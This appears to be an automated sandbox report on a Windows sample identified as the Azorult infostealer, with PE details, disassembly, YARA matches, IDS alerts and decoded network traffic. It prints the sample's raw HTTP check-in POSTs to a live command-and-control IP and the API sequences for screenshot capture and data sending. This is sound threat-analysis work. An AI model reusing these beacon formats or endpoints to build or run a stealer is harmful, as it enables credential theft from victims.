Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	12E56QE1Fc.exe renamed because original name is a hash value
Original Sample Name:	289c12d43aa35c8c8bf22bace3358cde.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 29 Number of non-executed functions: 76
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	4.elf	Get hash	malicious	Unknown	Browse	51.158.21.37
	miori.sh4.elf	Get hash	malicious	Unknown	Browse	212.129.5.22
	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	163.172.240.109
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	212.129.3.113
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	212.129.3.112
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse	51.15.58.224
	8p5iD52knN.exe	Get hash	malicious	Azorult	Browse	51.15.241.168
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	212.129.47.239
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	62.210.51.189
	nsharm5.elf	Get hash	malicious	Mirai	Browse	51.159.173.14

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.013521703464125
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	12E56QE1Fc.exe
File size:	344'576 bytes
MD5:	289c12d43aa35c8c8bf22bace3358cde
SHA1:	1395cfe674d743b8fe568ef373bd91ae7b030adf
SHA256:	1254f59c4d71b8cdf0601467e71c8d868f14195b9b27479fa82d19f9eb7dfc0c
SHA512:	19ac64147172d76855be6b4ba0c40c8017ece18039ddf12aaa357dc3fc9ddc6afa9841210daefe339076c4182ac1123037f966a65c9e15bfcb5848d33a6c47bd
SSDEEP:	6144:q+okc8afrZ3T9xk2g02IZPQFOtll1oemYO62LRTTRO:VoV9DJTPk2gnoPQFS1Dm162tJ
TLSH:	6574CF1467D6C431E81365B89669C3B24E7A3C786351A8CF6FC75AB64F393E0E63430A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................v.......B.......{...............C.......r.......u.....Rich....................PE..L.....J[...................

File Icon


Icon Hash:	4d2a2a5c31614d6d

Static PE Info

General

Entrypoint:	0x425f1d
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5B4A11CC [Sat Jul 14 15:07:56 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0ee9cfa9b63c2db5b2719d73b966f7f1

Entrypoint Preview

Instruction
call 00007F307086EC02h
jmp 00007F307086BDAEh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00441CC8h+ecx*8]
je 00007F307086BF35h
inc ecx
cmp ecx, 2Dh
jc 00007F307086BF13h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F307086BF30h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [00441CCCh+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F307086E5DBh
test eax, eax
jne 00007F307086BF28h
mov eax, 00441E30h
ret
add eax, 08h
ret
call 00007F307086E5C8h
test eax, eax
jne 00007F307086BF28h
mov eax, 00441E34h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F307086BF07h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F307086BEA7h
pop ecx
mov esi, eax
call 00007F307086BEE1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F307086E58Dh
test eax, eax
jne 00007F307086BF27h
push 0000000Ch
pop eax
pop ebp
ret
call 00007F307086BEC4h
mov ecx, dword ptr [ebp+08h]
mov dword ptr [eax], ecx
xor eax, eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
jne 00007F307086BF2Ch
call 00007F307086D6DAh

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xed000	0x3c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xef000	0xf88c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xff000	0xd78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3cc50	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xed250	0x214	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3ac68	0x3ae00	1ffbe9b77fa888c056d93c38dc2b73bf	False	0.5287080347664543	data	6.190134322987069	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3c000	0x480e	0x4a00	765060234479e16b0bf251ce626a18e4	False	0.20935388513513514	data	3.1343880087873326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x41000	0xabf78	0x2000	9001cb4e291326337115450b32aeb83f	False	0.095947265625	data	1.2181065100922521	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xed000	0x1cf8	0x1200	87b293a4a94207a8a00a1db59445fbde	False	0.2710503472222222	data	3.725112381818601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xef000	0xf88c	0xfa00	11eec42d63539d0445a95f42bc3f22c6	False	0.44328125	data	4.529337467503568	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xff000	0x1919	0x1a00	dffda6984192b03d366aea5e8c7f105e	False	0.44290865384615385	data	4.283332831369549	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
MAZIVUHONIRELI	0xfaeb0	0x1098	ASCII text, with very long lines (4248), with no line terminators	0.5988700564971752
NEJOWUCOXENASIYONEHOS	0xfa0b0	0x4ba	ASCII text, with very long lines (1210), with no line terminators	0.6231404958677685
VAVANOR	0xfa570	0x93c	ASCII text, with very long lines (2364), with no line terminators	0.6070219966159053
RT_ICON	0xef680	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5749097472924187
RT_ICON	0xeff28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5867052023121387
RT_ICON	0xf0490	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.5360995850622406
RT_ICON	0xf2a38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.6885245901639344
RT_ICON	0xf33c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.8421985815602837
RT_ICON	0xf3878	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.4565565031982942
RT_ICON	0xf4720	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.5094765342960289
RT_ICON	0xf4fc8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	0.6641705069124424
RT_ICON	0xf5690	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.4342485549132948
RT_ICON	0xf5bf8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.39450207468879667
RT_ICON	0xf81a0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.5525328330206379
RT_ICON	0xf9248	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	0.5668032786885245
RT_ICON	0xf9bd0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.650709219858156
RT_ACCELERATOR	0xfbf48	0x18	data	1.3333333333333333
RT_GROUP_ICON	0xf3828	0x4c	data	0.8289473684210527
RT_GROUP_ICON	0xfa038	0x76	data	0.6779661016949152

Imports

DLL

Import

KERNEL32.dll

GetFileTime, FindClose, GlobalAlloc, VirtualProtect, GetModuleHandleA, GetSystemDirectoryW, GetCommandLineA, SetEnvironmentVariableW, HeapUnlock, ReplaceFileA, EnumTimeFormatsW, GetVolumePathNamesForVolumeNameA, ReadConsoleA, WriteProfileStringA, LoadLibraryW, IsProcessorFeaturePresent, GetTickCount, Sleep, MoveFileWithProgressA, WaitForMultipleObjects, WaitForSingleObject, FormatMessageA, GetStringTypeExA, EnumSystemLocalesA, GetLocaleInfoA, HeapAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, EncodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, GetLocaleInfoW, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapFree, RtlUnwind, HeapSize, SetStdHandle, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, HeapReAlloc, CreateFileW, CloseHandle, FlushFileBuffers, GetUserDefaultLCID, IsValidLocale

MSIMG32.dll

GradientFill

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T12:02:01.040672+0100	2029467	ET MALWARE Win32/AZORult V3.3 Client Checkin M14	1	192.168.2.5	49704	51.15.142.235	80	TCP
2025-01-11T12:02:01.040672+0100	2810276	ETPRO MALWARE AZORult CnC Beacon M1	1	192.168.2.5	49704	51.15.142.235	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 12:02:00.289505959 CET	49704	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:00.294672012 CET	80	49704	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:00.294775009 CET	49704	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:00.294903040 CET	49704	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:00.299715996 CET	80	49704	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.040554047 CET	80	49704	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.040571928 CET	80	49704	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.040672064 CET	49704	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.043647051 CET	49704	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.048424959 CET	80	49704	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.050987959 CET	49705	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.055775881 CET	80	49705	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.055871964 CET	49705	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.055911064 CET	49705	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.060656071 CET	80	49705	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.828800917 CET	80	49705	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.828847885 CET	80	49705	51.15.142.235	192.168.2.5
Jan 11, 2025 12:02:01.828937054 CET	49705	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.829020023 CET	49705	80	192.168.2.5	51.15.142.235
Jan 11, 2025 12:02:01.833859921 CET	80	49705	51.15.142.235	192.168.2.5

HTTP Request Dependency Graph

51.15.142.235

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	51.15.142.235	80	6508	C:\Users\user\Desktop\12E56QE1Fc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 12:02:00.294903040 CET	306	OUT	POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: 51.15.142.235 Content-Length: 107 Cache-Control: no-cache Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
Jan 11, 2025 12:02:01.040554047 CET	456	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 11:02:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:00 GMT; Max-Age=7200 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	51.15.142.235	80	6508	C:\Users\user\Desktop\12E56QE1Fc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 12:02:01.055911064 CET	368	OUT	POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.0 Host: 51.15.142.235 Connection: close User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Content-Length: 107 Data Raw: 00 00 00 45 14 ef bf bd 30 62 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 46 70 ef bf bd 35 70 ef bf bd 47 70 ef bf bd 3a 70 ef bf bd 37 70 ef bf bd 32 70 ef bf bd 37 70 ef bf bd 3a 70 ef bf bd 33 70 ef bf bd 34 14 ef bf bd 31 11 ef bf bd 30 62 ef bf bd 30 60 ef bf bd 30 63 ef bf bd 30 63 ef bf bd 26 66 ef bf bd 45 17 ef bf bd 31 11 ef bf bd 30 63 ef bf bd 47 17 ef bf bd 30 65 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 26 67 ef bf bd 26 66 ef bf bd 45 70 ef bf bd 31 70 ef bf bd 37 70 ef bf bd 31 11 ef bf bd 30 6d ef bf bd 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
Jan 11, 2025 12:02:01.828800917 CET	423	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 11 Jan 2025 11:02:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Set-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:01 GMT; Max-Age=7200 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/

Target ID:	0
Start time:	06:01:59
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\12E56QE1Fc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\12E56QE1Fc.exe"
Imagebase:	0x400000
File size:	344'576 bytes
MD5 hash:	289C12D43AA35C8C8BF22BACE3358CDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: kevoreilly Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	18.8%
Total number of Nodes:	797
Total number of Limit Nodes:	16

Executed Functions

Function 00417B1A Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23

Strings

GdiplusStartup, xrefs: 00417B43
wcscmp, xrefs: 00417B29
Gdiplus.dll, xrefs: 00417B48, 00417B62, 00417B7C, 00417B96, 00417BB0, 00417BCA, 00417BE4
CreateStreamOnHGlobal, xrefs: 00417BF9
GdipCreateBitmapFromHBITMAP, xrefs: 00417B77
GdipSaveImageToStream, xrefs: 00417BDF
GdipDisposeImage, xrefs: 00417BC5
GdiplusShutdown, xrefs: 00417B5D
crtdll.dll, xrefs: 00417B2E
ole32.dll, xrefs: 00417BFE, 00417C18
GetHGlobalFromStream, xrefs: 00417C13
GdipGetImageEncodersSize, xrefs: 00417B91
GdipGetImageEncoders, xrefs: 00417BAB

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD

Function 00418124 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
WSAStartup.WS2_32(00000000,?), ref: 0041830C
socket.WS2_32(00000002,00000001,00000000), ref: 00418320
gethostbyname.WS2_32(00000000), ref: 00418343
htons.WS2_32(00000000), ref: 00418363
connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
closesocket.WS2_32(00000000), ref: 004184A9

Strings

Host: , xrefs: 00418398
HTTP/1.0, xrefs: 00418393
wsock32.dll, xrefs: 0041819D
Connection: close, xrefs: 004183A5
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 004183AF
Content-Length: , xrefs: 004183B9
User-agent: , xrefs: 004183AA
, xrefs: 004184B6
, xrefs: 004183FE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 4159890453-3355491746
Opcode ID: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
Opcode Fuzzy Hash: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58

